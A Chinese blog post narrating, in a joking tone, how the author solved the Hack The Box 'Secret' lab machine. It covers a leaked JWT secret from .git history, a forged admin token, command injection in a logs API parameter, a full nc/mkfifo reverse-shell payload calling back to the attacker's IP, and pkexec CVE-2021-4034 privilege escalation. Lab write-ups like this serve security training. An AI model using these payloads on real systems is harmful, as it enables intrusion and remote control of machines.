废物的靶场日记 hackthebox-Secret

最新推荐文章于 2024-01-30 15:09:01 发布
最新推荐文章于 2024-01-30 15:09:01 发布
阅读量1.4k 收藏
点赞数 3
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53302733/article/details/123644044
版权

废物靶场日记 hackthebox-Secret

最近在家嗯吃嗯造无所事事 废物的身份已经在家里呼之欲出了
于是决定在家人常出没时间段打打htb假装学习 以保持在家吃拿卡要的丰厚待遇
也是第一次玩htb 今天先整一个简单的试试手

前渗透

靶机IP 10.10.11.120
首先信息收集随便扫扫
nmap -sV -A 10.10.11.120

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:af:61:44:10:89:b9:53:f0:80:3f:d7:19:b1:e2:9c (RSA)
| 256 95:ed:65:8d💿08:2b:55:dd:17:51:31:1e:3e:18:12 (ECDSA)
|_ 256 33:7b:c1:71:d3:33:0f:92:4e:83:5a:1f:52:02:93:5e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: DUMB Docs
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp open http Node.js (Express middleware)
|_http-title: DUMB Docs
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

访问一下3000端口 有注册登录 注册是post一个怪东西
curl -d ‘{“name”:“wjzdala”,“email”:“wjzdala@dasith.works”,“password”: “123456aa” }’ http://10.10.11.120:3000/api/user/register -H ‘content-type:application/json’

然后按格式登录
curl -d ‘{“email”:“wjzdala@dasith.works”,“password”: “123456aa” }’ http://10.10.11.120:3000/api/user/login -H ‘content-type:application/json’

返回了一个token 按格式认证

curl http://10.10.11.120/api/priv
-H ‘auth-token:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjM3MDk3YTJhMmQ2YT
A0NzRlNDI1OWYiLCJuYW1lIjoid2p6ZGFsYSIsImVtYWlsIjoid2p6ZGFsYUBkYXNpdGgud29ya3MiLCJpYXQiOjE2NDc3NzQwOTB9.xebzSC8RfcfOWcJl8oTumadL0Mz0BMuy6lpWu2YDdTQ’

返回{“role”:{“role”:“you are normal user”,“desc”:“wjzdala”}} 嚯!normal user!纯纯的普信user了

很明显 这边就是要伪造token化身admin了 而3000端口主页直接有源码 但是这里我卡的批爆 找了找其他做了这个靶场的兄弟 好像也没什么办法能解决 死活下载不下来 思来想去最后灵光一闪决定鏖战老头环 然后第二天网络自愈了 下载下来看源码果不其然是要伪造admin的jwt 随便找个jwt解码网站
这里需要名字改成theadmin 还需要token 但是.env文件发现TOKEN_SECRET = secret 看似寄了
但是又发现他有.git文件 那必然得试一试.git泄露了 然后发现了真正的token
TOKEN_SECRET=gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE

于是伪造admin的jwt认证
curl http://10.10.11.120/api/priv -H ‘auth-token:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiO
iI2MjM4M2Q2NjYyNmVhMDA0NWZiMDg1YTAiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6IndqemRhbGFAZGFzaXRoLndvcmtzIiwiaWF0IjoxNjQ3ODUyOTA1fQ.pnlPhmL9KO0jWQ-uXhAWTS7IDuM
TmTIfEzjDZoMLch8’

返回{“creds”:{“role”:“admin”,“username”:“theadmin”,“desc”:“welcome back admin”}}

拿下!但是!没勾八用!

继续看代码发现同一个js里还有一个命令执行点 随便构造一下看看
curl ‘http://10.10.11.120/api/logs?file=;whoami’ -H ‘auth-token:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpX
VCJ9.eyJfaWQiOiI2MjM4M2Q2NjYyNmVhMDA0NWZiMDg1YTAiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6IndqemRhbGFAZGFzaXRoLndvcmtzIiwiaWF0IjoxNjQ3ODUyOTA1fQ.pnlPhmL9KO0jWQ-uXhAWTS7IDuMTmTIfEzjDZoMLch8’ 发现确实行 那必然是尝试nc弹shell

这里发现好多姿势都不行 但是还是能弹的
curl ‘http://10.10.11.120/api/logs?file=;rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.10%207888%20%3E/tmp/f’ -H ‘auth-token:eyJhbGciOiJIU
zI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjM4M2Q2NjYyNmVhMDA0NWZiMDg1YTAiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6IndqemRhbGFAZGFzaXRoLndvcmtzIiwiaWF0IjoxNjQ3ODUyOTA1fQ.pnlPhmL9KO0jWQ-uXhAWTS7IDuMTmTIfEzjDZoMLch8’ 拿下!找到第一个user的flag

后渗透

其实也没什么后渗透 就是提个权罢了 提权属实不太懂 首先随便看一下find / -perm -u=s -type f 2>/dev/null 本来想随便看看有没有find提权之类的 然而第一个就是/usr/bin/pkexec瞬间点醒我这个废物 必然是直接上我爹cve-2021-4034

于是python2 -m SimpleHTTPServer 80起个http shell上直接wget把东西传过去
这里我真是脑残 我穿了个下其他文件的cve-2021-4034.sh过去 然后对着下下来的几个空文件在那发呆 后来猛然惊觉不出网我是传了个勾八过去执行 然后重传文件忘记删原来的几个空文件了改名字删文件又搞了半天
然后cat /root/root.txt就是另外一个flag了 打完收工
在这里插入图片描述

ore0
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[HTB]HackTheBox-Easy-Secret国外渗透实战靶场
学习记录!大佬速速离开
04-17 4314
🧟无风祭酒🧟 小医救人😈大医济世 ☣️先礼后兵☢️ 👻警👻 📰Majority Papers为笔者学习所整理的内容,本意希望借此知识输出方式达到筑牢基础的效用。如若有不足之处,还望大哥哥海涵。🧱向值得学习的人学习,向前辈们致敬! 🌑🌕暗黑模式,解锁加倍沉浸式阅读快乐🥤 Wechat 公众号:acesec 江湖追杀令 🦾祭出Nmap ┌──(root💀kali)-[/home/kali] └─# nmap -sS -A -sC -sV -p- --min-r...
[Hack The Box] HTB—Secret walkthrough
ShenZ的博客
02-25 471
HTB—Secret [Hack The Box] HTB—Secret walkthrough 一、信息搜集 二、网站渗透 1.jwt伪造 2.命令执行 命令执行 const getLogs = git log --oneline ${file}; private.js这段代码会有一个命令执行 http://10.10.11.120:3000/api/logs?file=123;whoami; 3.写入ssh公钥 三、提权
安全练兵场-HackTheBox系列之Secret
Ms08067安全实验室
12-02 145
文章来源|MS08067 安全练兵场 知识星球本文作者:godunt(安全练兵场星球合伙人)玩靶场 认准安全练兵场成立"安全练兵场"的目的目前,安全行业热度逐年增加,很多新手安全从业人员在获取技术知识时,会局限于少量的实战中,技术理解得不到升华,只会像个脚本小子照着代码敲命令,遇到实战时自乱阵脚,影响心态的同时却自叹不如。而安全练兵场是由理论知识到实战过渡的一道大门,安全练兵场星球鼓励大家从实战中...
HackTheBox | Secret
Purpose_7的博客
01-06 121
HackTheBox | Secret
HackTheBox靶场系列(一)之HackTheBox靶场简介
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-30 3370
Hack The Box是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,其中有许多模拟真实场景的机器。HackTheBox靶场是一个虚拟的渗透测试训练平台,用于帮助安全研究人员、渗透测试人员和学生提高他们的技能。它包含一系列的虚拟机,其中每一个虚拟机都代表一个可攻击的目标系统。通过攻击这些虚拟机和解决它们的漏洞,用户可以提高自己的技能和知识,以更好地了解实际环境中的攻击和防御。
hackthebox注册教程
01-20
hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现需要邀请码,上网搜了搜,发现邀请码得...
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
Hack The Box,一款有意思的渗透测试平台
m0_60571990的博客
11-28 6533
Hack The Box,一款有意思的渗透测试平台
Hack The Box真实靶机环境搭建教程
大河之犬的博客
05-23 1985
应该是连接VPN走的端口,既然我们是在中国,还是选择UDP这种无连接的协议比较好。然后就可以下载VPN配置文件了。接下来,这里有欧洲和美国两个地区,每个地区只有一个服务节点,选择自己的VPN对应的节点。
《Hack The Box 玩转指南:初学者到高手的渗透测试之旅》
2201_75353421的博客
01-30 1796
《Hack The Box 实战指南:从注册到成功通关的渗透测试之旅》介绍了在Hack The Box平台上进行渗透测试的全过程。从注册开始,通过连接实验室、生成自己的服务器,一直到成功通关的每一步都得到详细解说。这是一篇适合初学者的实用指南,旨在帮助读者提高渗透测试技能和实际操作经验。
Hack The Box靶场使用流程及方法
z875611510的博客
06-09 4114
协议有两个:UDP1337、TCP443,应该是连接VPN走的端口,既然我们是在中国,还是选择UDP这种无连接的协议比较好。国内视频介绍(kali连接htb):https://www.bilibili.com/video/BV1Q94y1f73u。以上就是hackthebox靶场的使用和第一关详解,总的来说这个靶场还是基础的,里面的资源也比较丰富,适合安全初学者入门。登录我们的HTB账号,点击右上角的“CONNECT TO HTB”,上面有两个选项,这里选择入门的就行。
入坑 Hack The Box
LainWith的博客
10-19 1万+
视频介绍:https://www.bilibili.com/video/BV17T4y1i7Uh 官方文档:https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box个人感觉前者偏向实战一些,后者偏向练习题一些。更详细的区别,参见: https://hacktalk.net/hacking-the-box-htb-vs-vulnhub/过去注册HTB的时候,需要拿到邀请码才行,类似下面视频这种,但是现在你不需要邀请
Hackthebox入门
热门推荐
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
连接Hack The Box靶场教程
Atopos545的博客
01-24 1016
进去后选好节点,随便选一个就行。免费的就是下载对方vpn并连接,付费的就直接开启一个Pwnbox,我就用的是免费的,这里只介绍免费的方法。下好后把文件放到kali虚拟机里面,创建一个文件放进去就可以了,或者放桌面都行,就看你启动的时候方不方便。之后在终端启动openvpn,就刚才放进kali的文件。新手都是从Starting Point开始的,这里就以这个为例,其他的复刻一下这个步骤就好了。这三种分别对应左边的三种靶机,你要打那个靶机就去开启那个靶机对应的vpn。这样就可以尽情的去打靶,去渗透了!
第一章 网络安全从实战入门 hack the box
qq_42676415的博客
04-24 633
这会下载一个后缀为ovpn的文件,这个文件就是链接hack the box 的网络文件。(3)输入openvpn (路径)文件名,然后回车开始链接hack the box 的网络。二、我们使用kali系统,这个可以安装虚拟机,网络上教程一大堆,不在手把手教。(不会安装,不知道如何在官网下载的可以私信我)(2)输入sudo -I 命令切换为超级管理员用户。我们利用hack the box 进行教学,官方网址。在终端显示如下后,刷新网页如下右边就是链接成功。三、链接hack the box 的网络。
hackthebox - reel
11-03
HackTheBox - Reel是一个在黑客社区非常受欢迎的虚拟机靶场。这个靶场的目标是通过渗透测试和攻击手法,找到并获得系统的管理员权限。靶场基于漏洞存在和网络安全问题,提供了一个真实的环境来练习和提升安全技能。 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值